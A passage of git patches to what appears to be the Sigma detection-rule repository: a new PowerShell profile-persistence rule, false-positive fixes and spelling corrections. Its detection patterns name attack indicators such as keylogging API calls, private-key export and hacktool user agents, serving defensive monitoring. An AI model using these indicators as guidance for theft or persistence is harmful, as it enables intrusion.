HostApplication|startswith: - - "powershell" + - powershell.exe + - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe condition: selection and not filter falsepositives: - unknown From 48d0846b53d1bf22cbc9b24a0fe3ea1bd0d0adae Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 18 Aug 2021 14:29:50 +0200 Subject: [PATCH 0430/1367] add powershell_trigger_profiles --- .../powershell_trigger_profiles.yml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 rules/windows/powershell/powershell_trigger_profiles.yml diff --git a/rules/windows/powershell/powershell_trigger_profiles.yml b/rules/windows/powershell/powershell_trigger_profiles.yml new file mode 100644 index 00000000..58321ba2 --- /dev/null +++ b/rules/windows/powershell/powershell_trigger_profiles.yml @@ -0,0 +1,29 @@ +title: Powershell Trigger Profiles by Add_Content +id: 05b3e303-faf0-4f4a-9b30-46cc13e69152 +status: experimental +author: frack113 +date: 2021/08/18 +description: Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md +tags: + - attack.privilege_escalation + - attack.t1546.013 +logsource: + product: windows + service: powershell + definition: EnableScriptBlockLogging must be set to enable +detection: + selection: + EventID: 4104 + ScriptBlockText|contains|all: + - 'Add-Content' + - '$profile' + - '-Value' + ScriptBlockText|contains: + - 'Start-Process' + - '""' #cleanup action + condition: selection +falsepositives: + - Unknown +level: medium \ No newline at end of file From 2d05eda1beed0c81445d59ee0cdf9d152cffe619 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 18 Aug 2021 15:18:29 +0200 Subject: [PATCH 0431/1367] fix ContextInfo FP --- .../powershell/powershell_alternate_powershell_hosts.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml index 65aa3a58..582da352 100644 --- a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml @@ -21,12 +21,13 @@ level: medium logsource: product: windows service: powershell + definition: ModuleLogging must be enable detection: selection: EventID: 4103 ContextInfo: '*' filter: - ContextInfo|endswith: 'powershell.exe' + ContextInfo|contains: 'powershell.exe' # Host Application=...powershell.exe or Application hote=...powershell.exe in French Win10 event condition: selection and not filter --- logsource: From 44013e25c8f7b0185ac5a47a4c6a6d00bf080699 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 18 Aug 2021 17:26:57 +0200 Subject: [PATCH 0432/1367] fix: FPs with WMIADAP.exe --- rules/windows/image_load/sysmon_wmi_module_load.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/image_load/sysmon_wmi_module_load.yml b/rules/windows/image_load/sysmon_wmi_module_load.yml index 9203768f..e500bb6f 100755 --- a/rules/windows/image_load/sysmon_wmi_module_load.yml +++ b/rules/windows/image_load/sysmon_wmi_module_load.yml @@ -37,6 +37,7 @@ detection: - '\ngentask.exe' # c:\Windows\Microsoft.NET\Framework(64)\ngentask.exe - '\windows\system32\taskhostw.exe' # c:\windows\system32\taskhostw.exe - '\windows\system32\MoUsoCoreWorker.exe' # c:\windows\System32\MoUsoCoreWorker.exe on win10 20H04 at least + - '\windows\system32\wbem\WMIADAP.exe' # https://github.com/SigmaHQ/sigma/issues/1871 condition: selection and not filter fields: - ComputerName From 768855e6d6702cddab0abf621dbb539d6ce96378 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Wed, 18 Aug 2021 18:17:53 +0200 Subject: [PATCH 0433/1367] update modified after FP fix --- rules/windows/image_load/sysmon_wmi_module_load.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/image_load/sysmon_wmi_module_load.yml b/rules/windows/image_load/sysmon_wmi_module_load.yml index e500bb6f..57d3ade2 100755 --- a/rules/windows/image_load/sysmon_wmi_module_load.yml +++ b/rules/windows/image_load/sysmon_wmi_module_load.yml @@ -3,7 +3,7 @@ id: 671bb7e3-a020-4824-a00e-2ee5b55f385e description: Detects non wmiprvse loading WMI modules status: experimental date: 2019/08/10 -modified: 2021/06/15 +modified: 2021/08/18 author: Roberto Rodriguez @Cyb3rWard0g references: - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190811201010.html From 36406d57818025e653254c770868c949411528b0 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 18 Aug 2021 18:53:28 +0000 Subject: [PATCH 0434/1367] Fixed Spelling --- README.md | 2 +- .../azure/azure_kubernetes_secret_or_config_object_access.yml | 2 +- .../azure/azure_network_virtual_device_modified_or_deleted.yml | 2 +- rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml | 2 +- rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml | 2 +- 5 files changed, 5 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index 424533b5..2aeae254 100644 --- a/README.md +++ b/README.md @@ -304,7 +304,7 @@ S2AN was developed to be used as a standalone tool or as part of a CI/CD pipelin The directory `contrib` contains scripts that were contributed by the community: -* `sigma2elastalert.py`i by David Routin: A script that converts Sigma rules to Elastalert configurations. This tool +* `sigma2elastalert.py`i by David Routine: A script that converts Sigma rules to Elastalert configurations. This tool uses *sigmac* and expects it in its path. These tools are not part of the main toolchain and maintained separately by their authors. diff --git a/rules/cloud/azure/azure_kubernetes_secret_or_config_object_access.yml b/rules/cloud/azure/azure_kubernetes_secret_or_config_object_access.yml index 7fa6cbb9..108e64c2 100644 --- a/rules/cloud/azure/azure_kubernetes_secret_or_config_object_access.yml +++ b/rules/cloud/azure/azure_kubernetes_secret_or_config_object_access.yml @@ -1,6 +1,6 @@ title: Azure Kubernetes Secret or Config Object Access id: 7ee0b4aa-d8d4-4088-b661-20efdf41a04c -description: Identifies when a Kubernetes account access a sensitve objects such as configmaps or secrets. +description: Identifies when a Kubernetes account access a sensitive objects such as configmaps or secrets. author: Austin Songer @austinsonger status: experimental date: 2021/08/07 diff --git a/rules/cloud/azure/azure_network_virtual_device_modified_or_deleted.yml b/rules/cloud/azure/azure_network_virtual_device_modified_or_deleted.yml index 4034c0ce..fc3643fc 100644 --- a/rules/cloud/azure/azure_network_virtual_device_modified_or_deleted.yml +++ b/rules/cloud/azure/azure_network_virtual_device_modified_or_deleted.yml @@ -1,6 +1,6 @@ title: Azure Virtual Network Device Modified or Deleted id: 15ef3fac-f0f0-4dc4-ada0-660aa72980b3 -description: Identifies when a virtual network device is being modified or deleted. This can be a network interface, network virtual applicance, vitual hub, or virtual router. +description: Identifies when a virtual network device is being modified or deleted. This can be a network interface, network virtual appliance, virtual hub, or virtual router. author: Austin Songer status: experimental date: 2021/08/08 diff --git a/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml b/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml index 3ba671a0..c5d17b32 100644 --- a/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml +++ b/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml @@ -17,4 +17,4 @@ tags: - attack.impact - attack.t1565 falsepositives: - - Unkown + - Unknown diff --git a/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml b/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml index cbd76394..629dff39 100644 --- a/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml +++ b/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml @@ -19,4 +19,4 @@ level: medium tags: - attack.impact falsepositives: - - Unkown + - Unknown From c9128687eef1e0d4ff67e30dd8ce042e0db4d3f9 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 18 Aug 2021 18:58:20 +0000 Subject: [PATCH 0435/1367] Spelling Errors on Rules --- .../network/zeek/zeek_default_cobalt_strike_certificate.yml | 2 +- rules/proxy/proxy_baby_shark.yml | 2 +- rules/proxy/proxy_ua_hacktool.yml | 2 +- rules/web/web_cve_2021_22893_pulse_secure_rce_exploit.yml | 2 +- rules/web/web_expl_exchange_cve_2021_28480.yml | 2 +- rules/windows/builtin/win_hidden_user_creation.yml | 2 +- .../win_susp_failed_logons_single_source_kerberos.yml | 2 +- .../win_susp_failed_logons_single_source_kerberos2.yml | 2 +- .../win_susp_failed_logons_single_source_kerberos3.yml | 2 +- .../windows/builtin/win_susp_logon_explicit_credentials.yml | 2 +- rules/windows/other/win_lateral_movement_condrv.yml | 2 +- rules/windows/powershell/powershell_keylogging.yml | 2 +- .../powershell_suspicious_export_pfxcertificate.yml | 2 +- .../sysmon_cobaltstrike_bof_injection_pattern.yml | 2 +- .../process_access/sysmon_direct_syscall_ntopenprocess.yml | 2 +- .../sysmon_littlecorporal_generated_maldoc.yml | 2 +- .../sysmon_accesschk_usage_after_priv_escalation.yml | 2 +- rules/windows/process_creation/win_apt_hafnium.yml | 2 +- .../win_exchange_proxylogon_oabvirtualdir.yml | 2 +- .../process_creation/win_hiding_malware_in_fonts_folder.yml | 2 +- .../process_creation/win_lolbas_execution_of_wuauclt.yml | 2 +- .../process_creation/win_lolbin_execution_via_winget.yml | 2 +- .../process_creation/win_script_event_consumer_spawn.yml | 2 +- rules/windows/process_creation/win_susp_csi.yml | 2 +- rules/windows/process_creation/win_susp_vboxdrvInst.yml | 2 +- rules/windows/process_creation/win_susp_winrm_execution.yml | 2 +- rules/windows/process_creation/win_wmi_spwns_powershell.yml | 2 +- .../process_creation/win_wmiprvse_spawning_process.yml | 4 ++-- rules/windows/registry_event/sysmon_office_test_regadd.yml | 2 +- .../windows/registry_event/sysmon_susp_atbroker_change.yml | 6 +++--- .../registry_event/win_outlook_registry_todaypage.yml | 2 +- .../windows/registry_event/win_outlook_registry_webview.yml | 2 +- 32 files changed, 35 insertions(+), 35 deletions(-) diff --git a/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml b/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml index 6dad3ef8..a4e69cc5 100644 --- a/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml +++ b/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml @@ -1,6 +1,6 @@ title: Default Cobalt Strike Certificate id: 7100f7e3-92ce-4584-b7b7-01b40d3d4118 -description: Detects the presense of default Cobalt Strike certificate in the HTTPS traffic +description: Detects the presence of default Cobalt Strike certificate in the HTTPS traffic author: Bhabesh Raj date: 2021/06/23 references: diff --git a/rules/proxy/proxy_baby_shark.yml b/rules/proxy/proxy_baby_shark.yml index 8fc52699..5b6f980b 100644 --- a/rules/proxy/proxy_baby_shark.yml +++ b/rules/proxy/proxy_baby_shark.yml @@ -1,7 +1,7 @@ title: BabyShark Agent Pattern id: 304810ed-8853-437f-9e36-c4975c3dfd7e status: experimental -description: Detects Baby Shark C2 Framework communcation patterns +description: Detects Baby Shark C2 Framework communication patterns author: Florian Roth date: 2021/06/09 references: diff --git a/rules/proxy/proxy_ua_hacktool.yml b/rules/proxy/proxy_ua_hacktool.yml index 1e2f9653..bbb8a780 100644 --- a/rules/proxy/proxy_ua_hacktool.yml +++ b/rules/proxy/proxy_ua_hacktool.yml @@ -13,7 +13,7 @@ logsource: detection: selection: c-useragent|contains: - # Vulnerbility scanner and brute force tools + # Vulnerability scanner and brute force tools - '(hydra)' - ' arachni/' - ' BFAC ' diff --git a/rules/web/web_cve_2021_22893_pulse_secure_rce_exploit.yml b/rules/web/web_cve_2021_22893_pulse_secure_rce_exploit.yml index a5dbd897..ed2adbaa 100644 --- a/rules/web/web_cve_2021_22893_pulse_secure_rce_exploit.yml +++ b/rules/web/web_cve_2021_22893_pulse_secure_rce_exploit.yml @@ -30,5 +30,5 @@ detection: - 'metric' condition: selection1 and selection2 falsepositives: - - Vulnerability Scaning/Pentesting + - Vulnerability Scanning/Pentesting level: high diff --git a/rules/web/web_expl_exchange_cve_2021_28480.yml b/rules/web/web_expl_exchange_cve_2021_28480.yml index 62cd6efd..b3b3f21b 100644 --- a/rules/web/web_expl_exchange_cve_2021_28480.yml +++ b/rules/web/web_expl_exchange_cve_2021_28480.yml @@ -1,7 +1,7 @@ title: Exchange Exploitation CVE-2021-28480 id: a2a9d722-0acb-4096-bccc-daaf91a5037b status: experimental -description: Detects successfull exploitation of Exchange vulnerability as reported in CVE-2021-28480 +description: Detects successful exploitation of Exchange vulnerability as reported in CVE-2021-28480 references: - https://twitter.com/GossiTheDog/status/1392965209132871683?s=20 author: Florian Roth diff --git a/rules/windows/builtin/win_hidden_user_creation.yml b/rules/windows/builtin/win_hidden_user_creation.yml index 8dee8a7c..87c55ef8 100644 --- a/rules/windows/builtin/win_hidden_user_creation.yml +++ b/rules/windows/builtin/win_hidden_user_creation.yml @@ -21,5 +21,5 @@ fields: - EventCode - AccountName falsepositives: - - unkown + - unknown level: high diff --git a/rules/windows/builtin/win_susp_failed_logons_single_source_kerberos.yml b/rules/windows/builtin/win_susp_failed_logons_single_source_kerberos.yml index 5f7fb4bc..71c939ef 100644 --- a/rules/windows/builtin/win_susp_failed_logons_single_source_kerberos.yml +++ b/rules/windows/builtin/win_susp_failed_logons_single_source_kerberos.yml @@ -24,7 +24,7 @@ detection: - selection and not filter_computer | count(TargetUserName) by IpAddress > 10 falsepositives: - Vulnerability scanners - - Missconfigured systems + - Misconfigured systems - Remote administration tools - VPN terminators - Multiuser systems like Citrix server farms diff --git a/rules/windows/builtin/win_susp_failed_logons_single_source_kerberos2.yml b/rules/windows/builtin/win_susp_failed_logons_single_source_kerberos2.yml index 480663d1..1d45f289 100644 --- a/rules/windows/builtin/win_susp_failed_logons_single_source_kerberos2.yml +++ b/rules/windows/builtin/win_susp_failed_logons_single_source_kerberos2.yml @@ -24,7 +24,7 @@ detection: - selection and not filter_computer | count(TargetUserName) by IpAddress > 10 falsepositives: - Vulnerability scanners - - Missconfigured systems + - Misconfigured systems - Remote administration tools - VPN terminators - Multiuser systems like Citrix server farms diff --git a/rules/windows/builtin/win_susp_failed_logons_single_source_kerberos3.yml b/rules/windows/builtin/win_susp_failed_logons_single_source_kerberos3.yml index 8bc4d8b8..98f6e1d7 100644 --- a/rules/windows/builtin/win_susp_failed_logons_single_source_kerberos3.yml +++ b/rules/windows/builtin/win_susp_failed_logons_single_source_kerberos3.yml @@ -24,7 +24,7 @@ detection: - selection and not filter_computer | count(TargetUserName) by IpAddress > 10 falsepositives: - Vulnerability scanners - - Missconfigured systems + - Misconfigured systems - Remote administration tools - VPN terminators - Multiuser systems like Citrix server farms diff --git a/rules/windows/builtin/win_susp_logon_explicit_credentials.yml b/rules/windows/builtin/win_susp_logon_explicit_credentials.yml index 8d2c6c66..e947b6ae 100644 --- a/rules/windows/builtin/win_susp_logon_explicit_credentials.yml +++ b/rules/windows/builtin/win_susp_logon_explicit_credentials.yml @@ -1,4 +1,4 @@ -title: Suspicous Remote Logon with Explicit Credentials +title: Suspicious Remote Logon with Explicit Credentials id: 941e5c45-cda7-4864-8cea-bbb7458d194a status: experimental description: Detects suspicious processes logging on with explicit credentials diff --git a/rules/windows/other/win_lateral_movement_condrv.yml b/rules/windows/other/win_lateral_movement_condrv.yml index 73713305..796b506f 100644 --- a/rules/windows/other/win_lateral_movement_condrv.yml +++ b/rules/windows/other/win_lateral_movement_condrv.yml @@ -24,5 +24,5 @@ detection: ObjectName: '\Device\ConDrv' condition: selection falsepositives: - - Penetration tests where lateral movement has occured. This event will be created on the target host. + - Penetration tests where lateral movement has occurred. This event will be created on the target host. level: high diff --git a/rules/windows/powershell/powershell_keylogging.yml b/rules/windows/powershell/powershell_keylogging.yml index a3e3679e..82274561 100644 --- a/rules/windows/powershell/powershell_keylogging.yml +++ b/rules/windows/powershell/powershell_keylogging.yml @@ -19,7 +19,7 @@ detection: EventID: 4104 selection_basic: ScriptBlockText|contains: 'Get-Keystrokes' - selection_high: # want to run in backgroud and keybord + selection_high: # want to run in background and keyboard ScriptBlockText|contains|all: - 'Get-ProcAddress user32.dll GetAsyncKeyState' - 'Get-ProcAddress user32.dll GetForegroundWindow' diff --git a/rules/windows/powershell/powershell_suspicious_export_pfxcertificate.yml b/rules/windows/powershell/powershell_suspicious_export_pfxcertificate.yml index 6f1dfeba..6a621346 100644 --- a/rules/windows/powershell/powershell_suspicious_export_pfxcertificate.yml +++ b/rules/windows/powershell/powershell_suspicious_export_pfxcertificate.yml @@ -1,7 +1,7 @@ title: Suspicious Export-PfxCertificate id: aa7a3fce-bef5-4311-9cc1-5f04bb8c308c status: experimental -description: Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal provate keys from compromised machines +description: Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines references: - https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a - https://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate diff --git a/rules/windows/process_access/sysmon_cobaltstrike_bof_injection_pattern.yml b/rules/windows/process_access/sysmon_cobaltstrike_bof_injection_pattern.yml index 424ca2bc..de11db2d 100644 --- a/rules/windows/process_access/sysmon_cobaltstrike_bof_injection_pattern.yml +++ b/rules/windows/process_access/sysmon_cobaltstrike_bof_injection_pattern.yml @@ -18,7 +18,7 @@ detection: - '0x1fffff' condition: selection falsepositives: - - unkown + - unknown level: high tags: - attack.execution diff --git a/rules/windows/process_access/sysmon_direct_syscall_ntopenprocess.yml b/rules/windows/process_access/sysmon_direct_syscall_ntopenprocess.yml index 433cc150..fb8cad71 100755 --- a/rules/windows/process_access/sysmon_direct_syscall_ntopenprocess.yml +++ b/rules/windows/process_access/sysmon_direct_syscall_ntopenprocess.yml @@ -14,7 +14,7 @@ detection: CallTrace|startswith: 'UNKNOWN' condition: selection falsepositives: - - unkown + - unknown level: critical tags: - attack.execution diff --git a/rules/windows/process_access/sysmon_littlecorporal_generated_maldoc.yml b/rules/windows/process_access/sysmon_littlecorporal_generated_maldoc.yml index b9b54d10..7d79eb57 100644 --- a/rules/windows/process_access/sysmon_littlecorporal_generated_maldoc.yml +++ b/rules/windows/process_access/sysmon_littlecorporal_generated_maldoc.yml @@ -17,7 +17,7 @@ detection: - 'UNKNOWN' condition: selection falsepositives: - - unkown + - unknown level: high tags: - attack.execution diff --git a/rules/windows/process_creation/sysmon_accesschk_usage_after_priv_escalation.yml b/rules/windows/process_creation/sysmon_accesschk_usage_after_priv_escalation.yml index 0f53941d..75785c5a 100644 --- a/rules/windows/process_creation/sysmon_accesschk_usage_after_priv_escalation.yml +++ b/rules/windows/process_creation/sysmon_accesschk_usage_after_priv_escalation.yml @@ -1,6 +1,6 @@ title: Accesschk Usage After Privilege Escalation id: c625d754-6a3d-4f65-9c9a-536aea960d37 -description: Accesschk is an access and privilege audit tool developed by SysInternal and often being used by attacker to verify if a privilege escalation process succesfull or not +description: Accesschk is an access and privilege audit tool developed by SysInternal and often being used by attacker to verify if a privilege escalation process successful or not status: experimental author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community date: 2020/10/13 diff --git a/rules/windows/process_creation/win_apt_hafnium.yml b/rules/windows/process_creation/win_apt_hafnium.yml index 042fe15a..14772b4b 100644 --- a/rules/windows/process_creation/win_apt_hafnium.yml +++ b/rules/windows/process_creation/win_apt_hafnium.yml @@ -1,6 +1,6 @@ title: Exchange Exploitation Activity id: bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7 -description: Detects activity observed by different researchers to be HAFNIUM group acitivity (or related) on Exchange servers +description: Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers author: Florian Roth date: 2021/03/09 modified: 2021/03/16 diff --git a/rules/windows/process_creation/win_exchange_proxylogon_oabvirtualdir.yml b/rules/windows/process_creation/win_exchange_proxylogon_oabvirtualdir.yml index 64adeae7..96e0ed82 100644 --- a/rules/windows/process_creation/win_exchange_proxylogon_oabvirtualdir.yml +++ b/rules/windows/process_creation/win_exchange_proxylogon_oabvirtualdir.yml @@ -1,7 +1,7 @@ title: ProxyLogon MSExchange OabVirtualDirectory id: 550d3350-bb8a-4ff3-9533-2ba533f4a1c0 status: experimental -description: Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invokation of Set-OabVirtualDirectory +description: Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invocation of Set-OabVirtualDirectory references: - https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c author: Florian Roth diff --git a/rules/windows/process_creation/win_hiding_malware_in_fonts_folder.yml b/rules/windows/process_creation/win_hiding_malware_in_fonts_folder.yml index 811d34dc..6bc345d0 100644 --- a/rules/windows/process_creation/win_hiding_malware_in_fonts_folder.yml +++ b/rules/windows/process_creation/win_hiding_malware_in_fonts_folder.yml @@ -1,6 +1,6 @@ title: Writing Of Malicious Files To The Fonts Folder id: ae9b0bd7-8888-4606-b444-0ed7410cb728 -description: Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesnt require admin privillege to be written and executed from. +description: Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesn't require admin privillege to be written and executed from. references: - https://thedfirreport.com/2020/04/20/sqlserver-or-the-miner-in-the-basement/ date: 2020/21/04 diff --git a/rules/windows/process_creation/win_lolbas_execution_of_wuauclt.yml b/rules/windows/process_creation/win_lolbas_execution_of_wuauclt.yml index ffe74da9..c603644e 100644 --- a/rules/windows/process_creation/win_lolbas_execution_of_wuauclt.yml +++ b/rules/windows/process_creation/win_lolbas_execution_of_wuauclt.yml @@ -23,7 +23,7 @@ detection: - 'UpdateDeploymentProvider.dll /ClassId' condition: selection and not filter falsepositives: - - Wuaueng.dll which is a module belonging to Microsoft Wnidows Update. + - Wuaueng.dll which is a module belonging to Microsoft Windows Update. fields: - CommandLine level: medium \ No newline at end of file diff --git a/rules/windows/process_creation/win_lolbin_execution_via_winget.yml b/rules/windows/process_creation/win_lolbin_execution_via_winget.yml index ff0ef78b..9ff60bf8 100644 --- a/rules/windows/process_creation/win_lolbin_execution_via_winget.yml +++ b/rules/windows/process_creation/win_lolbin_execution_via_winget.yml @@ -20,7 +20,7 @@ detection: - '.*(?i)winget install (--m|-m).*' condition: selection falsepositives: - - Admin activity installing packages not in the official Microsoft repo. Winget probably wont be used by most users. + - Admin activity installing packages not in the official Microsoft repo. Winget probably won't be used by most users. fields: - CommandLine level: medium \ No newline at end of file diff --git a/rules/windows/process_creation/win_script_event_consumer_spawn.yml b/rules/windows/process_creation/win_script_event_consumer_spawn.yml index 7c525990..ddcae5ee 100644 --- a/rules/windows/process_creation/win_script_event_consumer_spawn.yml +++ b/rules/windows/process_creation/win_script_event_consumer_spawn.yml @@ -1,4 +1,4 @@ -title: Script Event Consumer Spawning Processs +title: Script Event Consumer Spawning Process id: f6d1dd2f-b8ce-40ca-bc23-062efb686b34 status: experimental description: Detects a suspicious child process of Script Event Consumer (scrcons.exe). diff --git a/rules/windows/process_creation/win_susp_csi.yml b/rules/windows/process_creation/win_susp_csi.yml index ee19fca9..d34670f5 100644 --- a/rules/windows/process_creation/win_susp_csi.yml +++ b/rules/windows/process_creation/win_susp_csi.yml @@ -1,6 +1,6 @@ title: Suspicious Csi.exe Usage id: 40b95d31-1afc-469e-8d34-9a3a667d058e -description: Csi.exe is a signed binary from Micosoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe' +description: Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe' status: experimental author: Konstantin Grishchenko, oscd.community date: 2020/10/17 diff --git a/rules/windows/process_creation/win_susp_vboxdrvInst.yml b/rules/windows/process_creation/win_susp_vboxdrvInst.yml index 024b5149..9b1eacab 100644 --- a/rules/windows/process_creation/win_susp_vboxdrvInst.yml +++ b/rules/windows/process_creation/win_susp_vboxdrvInst.yml @@ -1,6 +1,6 @@ title: Suspicious VBoxDrvInst.exe Parameters id: b7b19cb6-9b32-4fc4-a108-73f19acfe262 -description: Detect VBoxDrvInst.exe run whith parameters allowing processing INF file. This allows to create values in the registry and install drivers. +description: Detect VBoxDrvInst.exe run with parameters allowing processing INF file. This allows to create values in the registry and install drivers. For example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys status: experimental author: Konstantin Grishchenko, oscd.community diff --git a/rules/windows/process_creation/win_susp_winrm_execution.yml b/rules/windows/process_creation/win_susp_winrm_execution.yml index 2ecb2b39..108b1c27 100644 --- a/rules/windows/process_creation/win_susp_winrm_execution.yml +++ b/rules/windows/process_creation/win_susp_winrm_execution.yml @@ -1,6 +1,6 @@ title: Remote Code Execute via Winrm.vbs id: 9df0dd3a-1a5c-47e3-a2bc-30ed177646a0 -description: Detects an attempt to execude code or create service on remote host via winrm.vbs. +description: Detects an attempt to execute code or create service on remote host via winrm.vbs. status: experimental references: - https://twitter.com/bohops/status/994405551751815170 diff --git a/rules/windows/process_creation/win_wmi_spwns_powershell.yml b/rules/windows/process_creation/win_wmi_spwns_powershell.yml index dcd52ef3..90a71de0 100644 --- a/rules/windows/process_creation/win_wmi_spwns_powershell.yml +++ b/rules/windows/process_creation/win_wmi_spwns_powershell.yml @@ -25,7 +25,7 @@ detection: - '\powershell.exe' filter_null1: CommandLine: 'null' - filter_null2: # some backends need the null value in a seperate expression + filter_null2: # some backends need the null value in a separate expression CommandLine: null condition: selection and not filter_null1 and not filter_null2 falsepositives: diff --git a/rules/windows/process_creation/win_wmiprvse_spawning_process.yml b/rules/windows/process_creation/win_wmiprvse_spawning_process.yml index d5a59f6e..e0da3a8c 100644 --- a/rules/windows/process_creation/win_wmiprvse_spawning_process.yml +++ b/rules/windows/process_creation/win_wmiprvse_spawning_process.yml @@ -27,9 +27,9 @@ detection: - Image|endswith: - '\WmiPrvSE.exe' - '\WerFault.exe' - filter_null1: # some backends need the null value in a seperate expression + filter_null1: # some backends need the null value in a separate expression LogonId: null - filter_null2: # some backends need the null value in a seperate expression + filter_null2: # some backends need the null value in a separate expression SubjectLogonId: null condition: selection and not filter and not filter_null1 and not filter_null2 falsepositives: diff --git a/rules/windows/registry_event/sysmon_office_test_regadd.yml b/rules/windows/registry_event/sysmon_office_test_regadd.yml index c6d2069e..f8ec6212 100644 --- a/rules/windows/registry_event/sysmon_office_test_regadd.yml +++ b/rules/windows/registry_event/sysmon_office_test_regadd.yml @@ -1,7 +1,7 @@ title: Office Application Startup - Office Test id: 3d27f6dd-1c74-4687-b4fa-ca849d128d1c status: experimental -description: Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed everytime an Office application is started +description: Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started references: - https://attack.mitre.org/techniques/T1137/002/ author: omkar72 diff --git a/rules/windows/registry_event/sysmon_susp_atbroker_change.yml b/rules/windows/registry_event/sysmon_susp_atbroker_change.yml index 55850ba3..2800e4ee 100644 --- a/rules/windows/registry_event/sysmon_susp_atbroker_change.yml +++ b/rules/windows/registry_event/sysmon_susp_atbroker_change.yml @@ -1,6 +1,6 @@ title: Atbroker Registry Change id: 9577edbb-851f-4243-8c91-1d5b50c1a39b -description: Detects creation/modification of Assisitive Technology applications and persistance with usage of ATs +description: Detects creation/modification of Assisitive Technology applications and persistence with usage of ATs author: Mateusz Wydra, oscd.community references: - http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/ @@ -18,9 +18,9 @@ logsource: detection: creation: TargetObject|contains: 'Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs' - persistance: + persistence: TargetObject|contains: 'Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration' - condition: creation or persistance + condition: creation or persistence falsepositives: - Creation of non-default, legitimate AT. level: high diff --git a/rules/windows/registry_event/win_outlook_registry_todaypage.yml b/rules/windows/registry_event/win_outlook_registry_todaypage.yml index 71a6dca9..7b44bfde 100644 --- a/rules/windows/registry_event/win_outlook_registry_todaypage.yml +++ b/rules/windows/registry_event/win_outlook_registry_todaypage.yml @@ -1,6 +1,6 @@ title: Persistent Outlook Landing Pages id: 487bb375-12ef-41f6-baae-c6a1572b4dd1 -description: Detects the manipulation of persistant URLs which could execute malicious code +description: Detects the manipulation of persistent URLs which could execute malicious code status: experimental references: - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70 diff --git a/rules/windows/registry_event/win_outlook_registry_webview.yml b/rules/windows/registry_event/win_outlook_registry_webview.yml index 7033f1c0..62c4804f 100644 --- a/rules/windows/registry_event/win_outlook_registry_webview.yml +++ b/rules/windows/registry_event/win_outlook_registry_webview.yml @@ -1,6 +1,6 @@ title: Persistent Outlook Landing Pages id: ddd171b5-2cc6-4975-9e78-f0eccd08cc76 -description: Detects the manipulation of persistant URLs which can be malicious +description: Detects the manipulation of persistent URLs which can be malicious status: experimental references: - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70 From e039f9127273c533e3e70c929e219b3a945adbe9 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 18 Aug 2021 19:00:57 +0000 Subject: [PATCH 0436/1367] Spelling --- tests/test_rules.py | 6 +++--- tools/sigma/backends/devo.py | 2 +- tools/sigma/filter.py | 2 +- tools/sigma/sigma-uuid.py | 2 +- tools/sigma/sigma_uuid.py | 2 +- tools/sigma/sigmac.py | 2 +- 6 files changed, 8 insertions(+), 8 deletions(-) diff --git a/tests/test_rules.py b/tests/test_rules.py index 